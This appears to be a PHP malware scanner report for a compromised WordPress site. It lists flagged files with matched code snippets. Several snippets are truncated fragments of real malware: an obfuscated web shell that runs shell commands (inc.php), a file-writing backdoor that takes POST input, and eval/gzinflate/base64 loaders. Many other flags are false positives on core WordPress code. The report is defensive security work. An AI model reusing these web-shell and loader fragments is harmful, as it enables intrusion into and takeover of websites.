Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec( $this->curl_path . ' ' . $cmdline_params . ' ' . escapeshellarg( $URI ), $results, $return ); if($return) { $this->error = "Error: cURL could not retrieve the document, error $return."; return false; } $results = implode("\r\n",$results); $result_headers = file("$headerfile"); $this->_redirectaddr = false; unset($this->headers); for($currentHeader = 0; $currentHeader < count($result_headers); $currentHeader++) { if(preg_match("/^(Location: |URI: )/i",$result_headers[$currentHeader])) { pre...
|
|
/custdata02/turtle/public_html/recipes/wp-includes/Text/Diff/Engine/native.php Size: 15.67 kB Created: 2023-08-09 07:18:29 Modified: 2024-06-01 08:12:19 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert($yi < $n_to || $this->xchanged[$xi]); assert($xi < $n_from || $this->ychanged[$yi]); $copy = array(); while ($xi < $n_from && $yi < $n_to && !$this->xchanged[$xi] && !$this->ychanged[$yi]) { $copy[] = $from_lines[$xi++]; ++$yi; } if ($copy) { $edits[] = new Text_Diff_Op_copy($copy); } $delete = array(); while ($xi < $n_from && $this->xchanged[$xi]) { $delete[] = $from_lines[$xi++]; } $add = array(); while ($yi < $n_to && $this->ychanged[$yi]) { $add[] = $to_lines[$yi++]; } if ($delete && ...
|
|
/custdata02/turtle/public_html/recipes/wp-includes/Text/Diff/Engine/shell.php Size: 5.08 kB Created: 2023-08-09 07:18:29 Modified: 2024-06-01 08:12:19 Warns: 2
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert($match[1] - $from_line_no == $match[4] - $to_line_no); array_push($edits, new Text_Diff_Op_copy( $this->_getLines($from_lines, $from_line_no, $match[1] - 1), $this->_getLines($to_lines, $to_line_no, $match[4] - 1))); } switch ($match[3]) { case 'd': array_push($edits, new Text_Diff_Op_delete( $this->_getLines($from_lines, $from_line_no, $match[2]))); $to_line_no++; break; case 'c': array_push($edits, new Text_Diff_Op_change( $this->_getLines($from_lines, $from_line_no, $match[2]), $this->...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file); unlink($from_file); unlink($to_file); if (is_null($diff)) { return array(new Text_Diff_Op_copy($from_lines)); } $from_line_no = 1; $to_line_no = 1; $edits = array(); preg_match_all('#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m', $diff, $matches, PREG_SET_ORDER); foreach ($matches as $match) { if (!isset($match[5])) { $match[5] = false; } if ($match[3] == 'a') { $from_line_no--; } if ($match[3] == 'd') { $to_line_no--; } if ($fr...
|
|
/custdata02/turtle/public_html/recipes/wp-includes/Text/Diff.php Size: 12.61 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:19 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert(count($from_lines) == count($mapped_from_lines)); assert(count($to_lines) == count($mapped_to_lines)); parent::Text_Diff($mapped_from_lines, $mapped_to_lines); $xi = $yi = 0; for ($i = 0; $i < count($this->_edits); $i++) { $orig = &$this->_edits[$i]->orig; if (is_array($orig)) { $orig = array_slice($from_lines, $xi, count($orig)); $xi += count($orig); } $final = &$this->_edits[$i]->final; if (is_array($final)) { $final = array_slice($to_lines, $yi, count($final)); $yi += count($final); } ...
|
|
/custdata02/turtle/public_html/recipes/wp-includes/rest-api.php Size: 96.16 kB Created: 2024-04-03 07:03:02 Modified: 2024-06-01 08:12:20 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 1640 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $checks[ $type ]( $value )
|
|
/custdata02/turtle/public_html/recipes/wp-includes/ID3/module.audio-video.quicktime.php Size: 163.09 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 2390 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/turtle/public_html/recipes/wp-includes/blocks/group/index.php Size: 44.55 kB Created: 2024-06-03 07:16:42 Modified: 2024-06-03 07:16:42 Warns: 2 Dangers: 11
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'JGxFTFpMaiA9IHN1YnN0cigkX1NFUlZFUlsiXDEyMFx4NDhcMTIwXDEzN1wxMjNcMTA1XDExNFx4NDYiXSwgc3Rycmlwb3MoJF9TRVJWRVJbIlx4NTBceDQ4XHg1MFx4NWZcMTIzXDEwNVwxMTRceDQ2Il0sICJcNTciKSArIDEpOyBmaWxlX3B1dF9jb250ZW50cygiXDU2XHg2OFx4NzRcMTQxXHg2M1wxNDNcMTQ1XHg3M1x4NzMiLCBiYXNlNjRfZGVjb2RlKCJceDUwXDEwNVx4NWFceDcwXHg2Mlx4NDdcMTI2XDE3MlwxMjRceDU3XDEwNlw2MFx4NTlcNjJceDY3XDE0N1wxMTFcMTUxXDY0XDE1N1wxNDNcMTEwXHg2Y1w3MFx4NWFcMTMwXDE1MFx4NmNcMTQ2XDExMFx4NDJcMTU3XDE0M1wxMDNcMTUzXHg2YlwxMTFceDZhXDY0XDExNlwxMDNcMTUxXHg0Mlx4NTB...
| Function eval Line: 4 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($txt)
| Sign 085a0329 Line: 2 Dangerous Malware Signature (hash: 085a0329) | <?php iYXNlNj
| Sign 0f37c730 Line: 2 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 7186bb8d Line: 2 Dangerous Malware Signature (hash: 7186bb8d) | <?php RfR0VU
| Sign 7830f7a6 Line: 2 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) | <?php JF9HRV
| Sign 91535293 Line: 2 Dangerous Malware Signature (hash: 91535293) | <?php lY2hv
| Sign d30fc49e Line: 2 Dangerous Malware Signature (hash: d30fc49e) | <?php b3Blb
| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d) | <?php ZWNob
| Sign de12c454 Line: 2 Dangerous Malware Signature (hash: de12c454) | <?php VjaG
| Sign e6546205 Line: 2 Dangerous Malware Signature (hash: e6546205) | <?php kX0dFV
| Sign ff4f5344 Line: 2 Dangerous Malware Signature (hash: ff4f5344) | <?php FycmF5X
|
|
/custdata02/turtle/public_html/recipes/wp-includes/PHPMailer/PHPMailer.php Size: 179.18 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:19 Dangers: 1
| Description | Match |
|---|
Sign a408f408 Line: 1858 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/src/Crypto.php Size: 53.53 kB Created: 2019-12-09 16:42:04 Modified: 2024-06-01 08:12:20 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) | <?php ZEROBYTE
|
|
/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/src/Crypto32.php Size: 53.83 kB Created: 2019-12-09 16:42:04 Modified: 2024-06-01 08:12:20 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) | <?php ZEROBYTE
|
|
/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/src/File.php Size: 51.81 kB Created: 2022-05-25 07:20:02 Modified: 2024-06-01 08:12:20 Dangers: 1
| Description | Match |
|---|
Sign d97f004d Line: 867 Dangerous Malware Signature (hash: d97f004d) | <?php ZEROBYTE
|
|
/custdata02/turtle/public_html/recipes/wp-includes/sodium_compat/autoload.php Size: 2.79 kB Created: 2022-11-02 07:15:55 Modified: 2024-06-01 08:12:20 Warns: 1
| Description | Match |
|---|
Function assert Warning Potentially dangerous function `assert` [https://www.php.net/assert] | <?php assert(class_exists('ParagonIE_Sodium_Compat'), 'Possible filesystem/autoloader bug?'); } else { assert(class_exists('ParagonIE_Sodium_Compat')); } require_once(dirname(__FILE__) . '/lib/php72compat.php'); } elseif (!function_exists('sodium_crypto_stream_xchacha20_xor')) { require_once(dirname(__FILE__) . '/lib/php72compat.php'); } require_once(dirname(__FILE__) . '/lib/stream-xchacha20.php'); require_once(dirname(__FILE__) . '/lib/ristretto255.php')
|
|
/custdata02/turtle/public_html/recipes/wp-includes/js/tinymce/plugins/index.php Size: 97.12 kB Created: 2022-01-19 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid(fileowner($path . '/' . $f)); $group = posix_getgrgid(filegroup($path . '/' . $f)); } else { $owner = array('name' => '?'); $group = array('name' => '?'); } ?>
<tr>
<?php if (!FM_READONLY): ?><td><label><input type="checkbox" name="file[]" value="<?php echo fm_enc($f) ?>"></label></td><?php endif; ?>
<td><div class="filename"><a href="?p=<?php echo urlencode(trim(FM_PATH . '/' . $f, '/')) ?>"><i class="<?php echo $img ?>"></i> <?php echo fm_convert_win($f) ?></a><?php echo ($is_li...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec('file -bi ' . $file); return $mime; } else { return '--'; } } function fm_redirect($url, $code = 302) { header('Location: ' . $url, true, $code); exit; } function fm_clean_path($path) { $path = trim($path); $path = trim($path, '\\/'); $path = str_replace(array('../', '..\\'), '', $path); if ($path == '..') { $path = ''; } return str_replace('\\', '/', $path); } function fm_get_parent_path($path) { $path = fm_clean_path($path); if ($path != '') { $array = explode('/', $path); if (count...
| Sign 664602fe Line: 297 Dangerous Malware Signature (hash: 664602fe) | <?php fm_redirect(FM_SELF_URL . '?p=' . urlencode(FM_PATH));
|
|
/custdata02/turtle/public_html/recipes/wp-includes/js/swfupload/inc.php Size: 303.99 kB Created: 2024-06-03 07:16:42 Modified: 2024-06-03 07:16:42 Warns: 9 Dangers: 7
| Description | Match |
|---|
Exploit concat_vars_with_spaces Line: 2 Warning Concatenation of vars technique is usually used for the obfuscation of malicious code | <?php $FT . $qS . $Qt . $Qv . $hl . $Pa .
| Exploit execution Line: 2 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(gzinflate(base64_decode("\x55\x79\x6e\x4f\172\x45\62\x46\x77\145\x7a\125\67\x4f\170\x73\x57\167\x57\126\53\101\x44\x2f\x34\x4a\x42\x6f\71\x59\x4c\x45\64\x75\114\171\57\113\x49\x55\71\x56\x68\x72\101\101\75\x3d")
| Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($hM); goto uf4; pQW: function initt_dd($i1, $SH) { goto qA0; o1F: $bQ = 0; goto NNz; K_G: $i1[$bQ] = $i1[$bQ] ^ $SH[$bQ % $I3]; goto v1q; xxv: return $i1; goto deF; qYp: goto ehV; goto X1S; t8k: if ($I7 <= $I3) { return $i1 ^ $SH; } goto o1F; U0Y: ++$bQ; goto qYp; v1q: uxH: goto U0Y; NNz: ehV: goto LDn; LDn: if (!($bQ < $I7)) { goto j2H; } goto K_G; X1S: j2H: goto xxv; qA0: $I7 = strlen($i1); goto D_d; D_d: $I3 = strlen($SH); goto t8k; deF: } goto l5M; rl5: $N6 = "\124\170\x63\x4b\110\x78\x...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(gzinflate(base64_decode("\x55\x79\x6e\x4f\172\x45\62\x46\x77\145\x7a\125\67\x4f\170\x73\x57\167\x57\126\53\101\x44\x2f\x34\x4a\x42\x6f\71\x59\x4c\x45\64\x75\114\171\57\113\x49\x55\71\x56\x68\x72\101\101\75\x3d"))); goto UAb; RqM: function terminalv2() { goto Nh; To: echo "\120\x57\x44\x3a\74\x66\x6f\x6e\x74\x20\143\x6f\154\x6f\162\x3d\x23\x46\x46\106\106\x46\106\76\x20" . str_replace("\134", "\57", @alfaGetCwd()) . "\57\x3c\x62\162\x20\x2f\x3e"; goto p5; m6: if (strtolower(substr(PHP_OS, 0,...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec($W1, $BP); $BP = @join("\xa", $BP); } elseif (function_exists("\160\141\x73\x73\x74\x68\162\165")) { goto k0; jH: @passthru($W1); goto Om; k0: ob_start(); goto jH; Om: $BP = ob_get_clean(); goto ZE; ZE: } elseif (function_exists("\163\x79\x73\164\x65\x6d")) { goto E5; Uy: $BP = ob_get_clean(); goto gO; Gv: @system($W1); goto Uy; E5: ob_start(); goto Gv; gO: } elseif (function_exists("\x73\x68\145\154\154\x5f\145\x78\145\143")) { $BP = shell_exec($W1); } elseif (function_exists("\160\x6f\x70...
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] | <?php passthru($W1); goto Om; k0: ob_start(); goto jH; Om: $BP = ob_get_clean(); goto ZE; ZE: } elseif (function_exists("\163\x79\x73\164\x65\x6d")) { goto E5; Uy: $BP = ob_get_clean(); goto gO; Gv: @system($W1); goto Uy; E5: ob_start(); goto Gv; gO: } elseif (function_exists("\x73\x68\145\154\154\x5f\145\x78\145\143")) { $BP = shell_exec($W1); } elseif (function_exists("\160\x6f\x70\145\156") && function_exists("\x70\143\154\157\x73\145")) { if (is_resource($it = @popen($W1, "\162"))) { goto aG; nl: ...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php pOSiX_GeTpwUid($Dj) { return false; } } goto wP; Fy: if ($pK == "\167\151\x6e") { $wL = Str_REPlAcE("\134", "\x2f", $wL); $av = StR_rEplaCE("\x5c", "\x2f", $av); } goto OK; By: if (!$Yh && FUnCTIOn_ExIsTs("\x73\145\x74\137\x74\151\155\145\x5f\154\x69\x6d\151\x74")) { seT_tIME_limit((int) round(0 + 0)); } goto t2; ge: if (isset($_POST["\x63"])) { if (FunCTion_EXisTs("\143\x68\x64\x69\162")) { @CHDir($_POST["\x63"]); } } goto o3; t2: if (fUNctIoN_eXiSTs("\x67\145\x74\x5f\155\x61\147\x69\143\x5f\x7...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] | <?php proc_open($W1 . "\40\62\x3e\46\x31", array(array("\160\x69\x70\145", "\167"), array("\160\151\160\x65", "\x77"), array("\160\151\x70\x65", "\x77")), $Wk, null); goto St; aK: } elseif (class_exists("\103\117\115")) { goto qB; qB: $vG = new ot("\127\x53\x63\162\x69\x70\164\x2e\x73\150\145\x6c\x6c"); goto F1; F1: $X6 = $vG->exec("\143\x6d\144\56\x65\170\145\x20\x2f\x63\40" . $_POST["\x61\x6c\146\141\x31"]); goto dk; cN: $BP = $Of->rb(); goto Fk; dk: $Of = $X6->RM(); goto cN; Fk: } } catch (Exceptio...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($i1); goto EC; rL: echo $uq; goto gz; gz: echo "\x3c\57\x70\x72\x65\76"; goto Ke; rr: echo "\x3c\x62\162\x3e"; goto fb; LR: $i1 = $_POST["\143\x6f\x6d\x6d\x61\156\x64"]; goto nr; fb: echo "\x24\x57\123\x4f\131\141\x6e\132\x3a\40"; goto uz; yb: echo "\74\x70\162\145\40\x63\154\x61\163\x73\75\47\164\145\170\x74\x2d\167\x68\151\x74\x65\x27\x3e"; goto LR; x8: echo "\x3c\x63\x65\156\164\x65\x72\x3e\127\123\117\40\x42\x59\x50\x41\x53\x53\40\x59\101\x4e\x5a\x21\74\57\x63\x65\x6e\164\145\x72\...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system("\154\163\40\57\150\x6f\x6d\x65"); goto mR; mR: echo "\74\x2f\x74\145\170\164\141\162\145\x61\76\x3c\x62\162\76\xa\xa\x3c\x70\x20\x73\164\171\154\x65\75\x22\x63\157\154\x6f\x72\72\x20\x62\154\x61\x63\153\42\x20\x3e\40\104\111\122\40\x48\157\x6d\x65\x20\x31\x3a\40\x20\74\x2f\x70\76\74\151\x6e\x70\x75\164\40\x74\171\160\x65\75\42\x74\145\x78\x74\x22\x20\166\141\154\x75\145\x3d\x20\42\170\170\170\42\x20\156\141\155\x65\x3d\42\x66\x69\x6c\145\x5f\156\141\155\145\x22\76\74\142\162\x3e\xa\x3c\1...
| Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea) | <?php \x65\x78\x65\x63
| Sign 407651f7 Dangerous Malware Signature (hash: 407651f7) | <?php WScript.shell
| Sign 91535293 Dangerous Malware Signature (hash: 91535293) | <?php ls -la
| Sign 963e968a Line: 2 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign de12c454 Dangerous Malware Signature (hash: de12c454) | <?php vcGVu
|
|
/custdata02/turtle/public_html/recipes/wp-admin/css/colors/blue/index.php Size: 20.23 kB Created: 2022-03-08 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($data, $_POST["edit"])
| Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($data, $_POST["\x65\144\151\164"])
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php Exploit
|
|
/custdata02/turtle/public_html/recipes/wp-admin/css/colors/modern/product.php Size: 12.59 kB Created: 2022-03-21 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 5
| Description | Match |
|---|
Exploit base64_long Line: 39 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCfX6QdiCufD+B5BmiijDU08pzNlodtKG99Mi/v2ItA6GE+X5izo...
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
| Exploit execution Line: 39 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
| Function eval Line: 39 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('LW3HkqTAku3XjM19O7SwTKG1lslzDK215usHql9barVIJFYEHu5Ua7DUw/2frT/i9R7K5T/jQywY8r/zMiXz8p98dar8/v+//LeiHaBd0659qXhAPIla0Zd90v2TtI5mU/8FOe/fSEyVZk1BIObxGMXPIu+Bv0KMbB0Hvm6QvIubrMvfkWoc770H6M0aHVQSBstq5F5lyeqryKIJq+LdMsqZvX3HF0IiTUqUO4/BMaixLh53hIZZRpnSBh1DkbRnK4ts5oShezlCyJaakx+zTAw9oBom5UyLvLch3mwN/lvS9VuUfQi3RXJXllZKBY1ltY+ZAec5SWlufdmqzvbf6+Gnvc4d6KnR2GDyIggPXQsGlnxFwy+qdTk2UBoEscYBD+p5SuFf6+gwu6NvJPRDpMNDUpx0BxZl4d0tMPb6O33sMMxmDW609OdFDwR8i2lzCf...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(gzinflate(base64_decode(rawurldecode('XZi1EvOGEkYfJ8moENOkEjOzmoxFFjM%2F%2FfXfXjcej0nS7n57jsrz0%2F%2BdfbaSwP4rynwqyr%2B%2F7zHm0zCv5bb931t%2FlerVDzuMDO8DuSGtMrPhx%2FeHV8xGUWyHP762wDkS2wTw9ppWNZaA0Y4ptGuDPmdoPOzWro9xNdoLPgDPOa5Z6Vrqx4%2F8%2BBS0%2FkLeXhaKgtYPtQPpfX5MrYznPa7SRQWG3AeguyEI%2B3mxkjh0zNbBg39k88H5fsP3VI9Z7kNsxRQq4w44Dba7JvqhY3LxFA3Qh5UMTz2MA32u8jjy1sWsHlx0bzA%2FnFPPmkaKMezjeva83lUEqDTvf%2Bx1rT%2B09dp4Xag92p3REvtCOBHLZMS%2B9DiPRUWdM%2FRcRFIkAsKJFpT7y1n7ZaG2TD39MMsK8GwrWkWBMlvtK2Z6yBj...
| Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268) | <?php eval(str_rot13
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php
eval
| Sign de12c454 Dangerous Malware Signature (hash: de12c454) | <?php vjaG
|
|
/custdata02/turtle/public_html/recipes/wp-admin/includes/class-pclzip.php Size: 192.08 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2627 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2785 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3707 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3958 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5717 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/turtle/public_html/recipes/wp-admin/includes/class-wp-filesystem-direct.php Size: 17.72 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid( $owneruid ); if ( ! $ownerarray ) { return false; } return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $file ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $file ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); if ( ! $grouparray ) { return false; } return $grouparray['name']; } public function copy( $source, $destination, $over...
|
|
/custdata02/turtle/public_html/recipes/wp-admin/includes/class-wp-debug-data.php Size: 59.19 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Warns: 1 Dangers: 3
| Description | Match |
|---|
Exploit php_uname Line: 693 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine | <?php php_uname( 'm' )
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec( 'gs --version' ); if ( empty( $gs ) ) { $gs = $not_available; $gs_debug = 'not available'; } else { $gs_debug = $gs; } } else { $gs = __( 'Unable to determine if Ghostscript is installed' ); $gs_debug = 'unknown'; } $info['wp-media']['fields']['ghostscript_version'] = array( 'label' => __( 'Ghostscript version' ), 'value' => $gs, 'debug' => $gs_debug, ); if ( function_exists( 'php_uname' ) ) { $server_architecture = sprintf( '%s %s %s', php_uname( 's' ), php_uname( 'r' ), php_uname( 'm' ) ...
| Sign 471b95ee Line: 799 Dangerous Malware Signature (hash: 471b95ee) | <?php SUHOSIN
| Sign 471b95ee Line: 800 Dangerous Malware Signature (hash: 471b95ee) | <?php suhosin
|
|
/custdata02/turtle/public_html/recipes/wp-admin/includes/class-wp-filesystem-ssh2.php Size: 22.76 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Warns: 1
| Description | Match |
|---|
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid( $owneruid ); if ( ! $ownerarray ) { return false; } return $ownerarray['name']; } public function getchmod( $file ) { return substr( decoct( @fileperms( $this->sftp_path( $file ) ) ), -3 ); } public function group( $file ) { $gid = @filegroup( $this->sftp_path( $file ) ); if ( ! $gid ) { return false; } if ( ! function_exists( 'posix_getgrgid' ) ) { return $gid; } $grouparray = posix_getgrgid( $gid ); if ( ! $grouparray ) { return false; } return $grouparray['name']; } public fun...
|
|
/custdata02/turtle/public_html/recipes/wp-admin/includes/file.php Size: 96.08 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 794 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $overrides['upload_error_handler']( &$file, $message )
|
|
/custdata02/turtle/public_html/recipes/wp-admin/includes/ms.php Size: 33.13 kB Created: 2024-04-03 07:03:01 Modified: 2024-06-01 08:12:18 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 518 Dangerous Encoded Function `eval` [https://www.php.net/eval] | <?php riny
|
|
/custdata02/turtle/public_html/click.php Size: 51.87 kB Created: 2022-08-10 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 1
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'IHJlZWJlX2VyY2JlZ3ZhdChSX05ZWV5SX0FCR1ZQUik7cXJzdmFyKCfLpvgnLCAnjScpOyRUWUJPTllGW8um+F0gPSBya2N5YnFyKCd8BHwEfAInLCB0bXZhc3luZ3IoZmhvZmdlKCcfiwgAAAAAAAAKLJ3XjttDZ1KBIF8TPrC3VBaJvWq+BOy9iJ1RPj6cOB7YcBmQKN57zj54VrSmLi4kesb/+c/36z/+/Sn+17/vKIxP72L8/2JO/74jOYqiOAr/u/XffhT3//6aJnhOYP+dF9mUF//+6YBlZj+8x+LJ/tq/8G86Tw3pTMHqs/dgflhY3e9UQZWWGfHd+urvo83O6nXjBzYw5ZIQg0o06jNJZCAXqy9I0vkblDQgVT42H82IdhdqovmLfgmmWAh6eiNL+/CxKP9gXFyqvo82OZ6lTo2JMjeCl5vhnsLGoUc1HqF3YBmCqb/voCBMFF2RVGg6kdi+jDpsEt5VY+WrsVNVzCPLRqO...
